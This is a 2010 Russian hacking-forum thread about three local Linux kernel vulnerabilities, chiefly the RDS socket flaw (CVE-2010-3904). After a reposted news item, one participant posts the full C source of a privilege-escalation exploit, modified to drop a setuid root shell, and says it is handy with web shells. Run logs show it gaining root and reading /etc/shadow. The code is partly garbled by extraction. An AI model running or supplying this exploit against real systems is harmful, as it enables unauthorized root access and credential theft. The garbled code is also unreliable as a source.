В Linux-ядре обнаружены три опасные локальные уязвимости

Discussion in 'Мировые новости. Обсуждения.' started by void., 21 Oct 2010.

  1. void.

    void. Member

    Joined:
    24 Jun 2010
    Messages:
    0
    Likes Received:
    14
    Reputations:
    5
    В реализации поддержки сетевого протокола RDS (Reliable Datagram Sockets), разработанного компанией Oracle, найдена уязвимость, позволяющая локальному злоумышленнику выполнить код с повышенными привилегиями через отправку специально оформленного запроса к RDS-сокету. Наличие уязвимости подтверждено в Linux-ядрах с 2.6.30 по 2.6.36-rc8, собранных с включенной опцией CONFIG_RDS. Большинство Linux-дистрибутивов подвержены уязвимости, так как поддержка RDS включена в виде модуля (проверить можно командой "cat /boot/config-2.6.3* |grep CONFIG_RDS").

    Опасность уязвимости усугубляется наличием эксплоита в открытом доступе. Исправление пока доступно только в виде патча к Linux-ядру. Доступность исправлений для различных Linux-дистрибутивов можно отследить на следующих страницах: Slackware, Gentoo, Mandriva, openSUSE, CentOS, Fedora, RHEL, Debian, Ubuntu.

    В качестве временной меры защиты, рекомендуется запретить автоматическую загрузку RDS-модуля:
    Код:
    Дополнительно сообщается об исправлении в тестовой сборке Linux-ядра 2.6.36-rc7 уязвимости в DRM-модуле для видеокарт i915. Отправка специально оформленного запроса через i915 GEM ioctl потенциально может привести к выполнению кода локального злоумышленника с привилегиями ядра системы.

    Кроме того, в реализации функции "snd_ctl_new()" из звуковой подсистемы Linux-ядра найдено целочисленное переполнение, используя которое локальный злоумышленник может вызвать крах ядра или потенциально организовать выполнение кода с повышенными привилегиями через отправку специально подготовленного запроса к устройству "/dev/snd/controlC*. Проблема устранена в тестовой сборке 2.6.36-rc7.

    20.10.2010
    Взято:http://www.opennet.ru/opennews/art.shtml?num=28355​
     
    3 people like this.
  2. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,167
    Likes Received:
    617
    Reputations:
    690
    Немного доработанная версия сплойта:
    http://www.vsecurity.com/download/tools/linux-rds-exploit.c
     
    _________________________
  3. Партнёр

    Joined:
    7 Sep 2010
    Messages:
    224
    Likes Received:
    67
    Reputations:
    1
    капец. ХП анд 7 самое оно
     
    2 people like this.
  4. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    Порутал себя =)
     
    1 person likes this.
  5. dupD0M

    dupD0M Elder - Старейшина

    Joined:
    18 May 2010
    Messages:
    1,130
    Likes Received:
    74
    Reputations:
    34
    и до линукса добрались!
     
  6. tux

    tux Elder - Старейшина

    Joined:
    26 Mar 2009
    Messages:
    423
    Likes Received:
    231
    Reputations:
    67
    $ ./a.out
    [*] Linux kernel >= 2.6.30 RDS socket exploit
    [*] by Dan Rosenberg
    [*] Could not open socket.

    $ uname -r
    2.6.35-gentoo-r11

    Нефик всякую чушь в конфиге включать ;)
    P.S. Только 35 ядро собрал, как уже 36 пришло. Погреемся :)
     
    #6 tux, 21 Oct 2010
    Last edited: 21 Oct 2010
    1 person likes this.
  7. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    Подарок кидисам =)
    Сплойт создает суид шелл, что удобно при выполнение команд с веб-шелла.
    После запуска в текущей директории появиться файл suid

    Code:
    [B]fork@atec:~$[/B] gcc exp.c 
    [B]fork@atec:~$[/B] ./a.out
    
    [*] Overwriting function pointer...
    
    [*] Triggering payload...
    
    [*] Restoring function pointer...
    
    [*] Created shell! (suid)
    [B]fork@atec:~$[/B] ./suid id
    uid=0(root) gid=0(root) 
    [B]fork@atec:~$[/B] ./suid "cat /etc/shadow | head"
    root:$----/:14599:0:99999:7:::
    daemon:*:14545:0:99999:7:::
    bin:*:14545:0:99999:7:::
    sys:*:14545:0:99999:7:::
    sync:*:14545:0:99999:7:::
    games:*:14545:0:99999:7:::
    man:*:14545:0:99999:7:::
    lp:*:14545:0:99999:7:::
    mail:*:14545:0:99999:7:::
    news:*:14545:0:99999:7:::
    
    PHP:
    /* 
     * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
     * CVE-2010-3904
     * by Dan Rosenberg <[email protected]>
     * Modified by shellz
     *
     * Copyright 2010 Virtual Security Research, LLC
     *
     * The handling functions for sending and receiving RDS messages
     * use unchecked __copy_*_user_inatomic functions without any
     * access checks on user-provided pointers.  As a result, by
     * passing a kernel address as an iovec base address in recvmsg-style
     * calls, a local user can overwrite arbitrary kernel memory, which
     * can easily be used to escalate privileges to root.  Alternatively,
     * an arbitrary kernel read can be performed via sendmsg calls.
     *
     * This exploit is simple - it resolves a few kernel symbols,
     * and overwrites a function pointer (rds_ioctl) to point
     * to the payload.  After triggering the payload, the original
     * value is restored.  Hard-coding the offset of this function
     * pointer is a bit inelegant, but I wanted to keep it simple and
     * architecture-independent (i.e. no inline assembly).
     *
     * The vulnerability is yet another example of why you shouldn't
     * allow loading of random packet families unless you actually
     * need them.
     *
     * Greets to spender, kees, taviso, hawkes, team lollerskaters,
     * joberheide, bla, sts, and VSR
     *
     */


    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <errno.h>
    #include <string.h>
    #include <sys/utsname.h>

    #define RECVPORT 5555 
    #define SENDPORT 6666

    int prep_sock(int port)
    {
        
        
    int sret;
        
    struct sockaddr_in addr;

        
    socket(PF_RDSSOCK_SEQPACKET0);

        if(
    0) {
            
    printf("[*] Could not open socket.\n");
            exit(-
    1);
        }
        
        
    memset(&addr0sizeof(addr));

        
    addr.sin_addr.s_addr inet_addr("127.0.0.1");
        
    addr.sin_family AF_INET;
        
    addr.sin_port htons(port);

        
    ret bind(s, (struct sockaddr *)&addrsizeof(addr));

        if(
    ret 0) {
            
    printf("[*] Could not bind socket.\n");
            exit(-
    1);
        }

        return 
    s;

    }

    void get_message(unsigned long addressint sock)
    {

        
    recvfrom(sock, (void *)addresssizeof(void *), 0,
             
    NULLNULL);

    }

    void send_message(unsigned long valueint sock)
    {
        
        
    int sizeret;
        
    struct sockaddr_in recvaddr;
        
    struct msghdr msg;
        
    struct iovec iov;
        
    unsigned long buf;
        
        
    memset(&recvaddr0sizeof(recvaddr));

        
    size sizeof(recvaddr);

        
    recvaddr.sin_port htons(RECVPORT);
        
    recvaddr.sin_family AF_INET;
        
    recvaddr.sin_addr.s_addr inet_addr("127.0.0.1");

        
    memset(&msg0sizeof(msg));
        
        
    msg.msg_name = &recvaddr;
        
    msg.msg_namelen sizeof(recvaddr);
        
    msg.msg_iovlen 1;
        
        
    buf value;

        
    iov.iov_len sizeof(buf);
        
    iov.iov_base = &buf;

        
    msg.msg_iov = &iov;

        
    ret sendmsg(sock, &msg0);
        if(
    ret 0) {
            
    printf("[*] Something went wrong sending.\n");
            exit(-
    1);
        }
    }

    void write_to_mem(unsigned long addrunsigned long valueint sendsockint recvsock)
    {

        if(!
    fork()) {
                
    sleep(1);
                
    send_message(valuesendsock);
                exit(
    1);
        }
        else {
            
    get_message(addrrecvsock);
            
    wait(NULL);
        }

    }

    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;

    int __attribute__((regparm(3)))
    getroot(void filevoid vma)
    {

        
    commit_creds(prepare_kernel_cred(0));
        return -
    1;    

    }

    /* thanks spender... */
    unsigned long get_kernel_sym(char *name)
    {
        
    FILE *f;
        
    unsigned long addr;
        
    char dummy;
        
    char sname[512];
        
    struct utsname ver;
        
    int ret;
        
    int rep 0;
        
    int oldstyle 0;

        
    fopen("/proc/kallsyms""r");
        if (
    == NULL) {
            
    fopen("/proc/ksyms""r");
            if (
    == NULL)
                goto 
    fallback;
            
    oldstyle 1;
        }

    repeat:
        
    ret 0;
        while(
    ret != EOF) {
            if (!
    oldstyle)
                
    ret fscanf(f"%p %c %s\n", (void **)&addr, &dummysname);
            else {
                
    ret fscanf(f"%p %s\n", (void **)&addrsname);
                if (
    ret == 2) {
                    
    char *p;
                    if (
    strstr(sname"_O/") || strstr(sname"_S."))
                        continue;
                    
    strrchr(sname'_');
                    if (
    > ((char *)sname 5) && !strncmp(3"smp"3)) {
                        
    4;
                        while (
    > (char *)sname && *(1) == '_')
                            
    p--;
                        *
    '\0';
                    }
                }
            }
            if (
    ret == 0) {
                
    fscanf(f"%s\n"sname);
                continue;
            }
            if (!
    strcmp(namesname)) {
                
    fprintf(stdout" [+] Resolved %s to %p%s\n"name, (void *)addrrep " (via System.map)" "");
                
    fclose(f);
                return 
    addr;
            }
        }

        
    fclose(f);
        if (
    rep)
            return 
    0;
    fallback:
        
    /* didn't find the symbol, let's retry with the System.map
           dedicated to the pointlessness of Russell Coker's SELinux
           test machine (why does he keep upgrading the kernel if
           "all necessary security can be provided by SE Linux"?)
        */
        
    uname(&ver);
        if (
    strncmp(ver.release"2.6"3))
            
    oldstyle 1;
        
    sprintf(sname"/boot/System.map-%s"ver.release);
        
    fopen(sname"r");
        if (
    == NULL)
            return 
    0;
        
    rep 1;
        goto 
    repeat;
    }

    int main(int argcchar argv[])
    {
        
    unsigned long sock_opsrds_ioctltarget;
        
    int sendsockrecvsock;
        
    struct utsname ver;

        
    printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
        
    printf("[*] by Dan Rosenberg\n");

        
    uname(&ver);

        if(
    strncmp(ver.release"2.6.3"5)) {
            
    printf("[*] Your kernel is not vulnerable.\n");
            return -
    1;
        }    
        
        
    sendsock prep_sock(SENDPORT);
        
    recvsock prep_sock(RECVPORT);

        
    /* Resolve addresses of relevant symbols */
        
    printf("[*] Resolving kernel addresses...\n");
        
    sock_ops get_kernel_sym("rds_proto_ops");
        
    rds_ioctl get_kernel_sym("rds_ioctl");
        
    commit_creds = (_commit_credsget_kernel_sym("commit_creds");
        
    prepare_kernel_cred = (_prepare_kernel_credget_kernel_sym("prepare_kernel_cred");

        if(!
    sock_ops || !rds_ioctl || !commit_creds || !prepare_kernel_cred) {
            
    printf("[*] Failed to resolve kernel symbols.\n");
            return -
    1;
        }

        
    /* Calculate target */
        
    target sock_ops sizeof(void *);

        
    /* Overwrite rds_ioctl function pointer */
        
    printf("[*] Overwriting function pointer...\n");
        
    write_to_mem(target, (unsigned long)&getrootsendsockrecvsock);

        
    /* Trigger the payload */
        
    printf("[*] Triggering payload...\n");
        
    ioctl(sendsock0NULL);

        
    /* Restore the rds_ioctl function pointer */
        
    printf("[*] Restoring function pointer...\n");
        
    write_to_mem(targetrds_ioctlsendsockrecvsock);

        if(
    getuid()) {
            
    printf("[*] Exploit failed to get root.\n");
            return -
    1;
        } 
            
    printf("[*] Created shell! (suid)\n");
        
    execl("/bin/bash""bash""-c""echo '#include <stdio.h>\nint main(int argc, char *argv[])\n{setuid(0);setgid(0);system(argv[1]);return 0;}' > suid.c; gcc suid.c -o suid; chmod +s suid; rm -rf suid.c"NULL);
    }

     
    #7 shellz[21h], 23 Oct 2010
    Last edited: 23 Oct 2010
  8. tux

    tux Elder - Старейшина

    Joined:
    26 Mar 2009
    Messages:
    423
    Likes Received:
    231
    Reputations:
    67
    user@user-desktop:~/0$ uname -a
    Linux user-desktop 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686 GNU/Linux
    user@user-desktop:~/0$ gcc exp.c
    user@user-desktop:~/0$ ./a.out
    [*] Linux kernel >= 2.6.30 RDS socket exploit
    [*] by Dan Rosenberg
    [*] Resolving kernel addresses...
    [+] Resolved rds_proto_ops to 0xf9657a80
    [+] Resolved rds_ioctl to 0xf9651000
    [+] Resolved commit_creds to 0xc016c830
    [+] Resolved prepare_kernel_cred to 0xc016cc80
    [*] Overwriting function pointer...
    [*] Triggering payload...
    [*] Restoring function pointer...
    [*] Exploit failed to get root.

    Оно бы еще работало. Бог с ней, с моей джентой и 36 ядром, но тут же простая убунта 10.10. В виртуалке ;)
     
  9. EviJI

    EviJI Banned

    Joined:
    8 Jun 2009
    Messages:
    81
    Likes Received:
    39
    Reputations:
    2
    Пошутил?
     
  10. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    Мое ядрышко давно не обновлялось, и настройки ядра default Ubuntu 9.10 =)
    Linux atec 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux
     
Loading...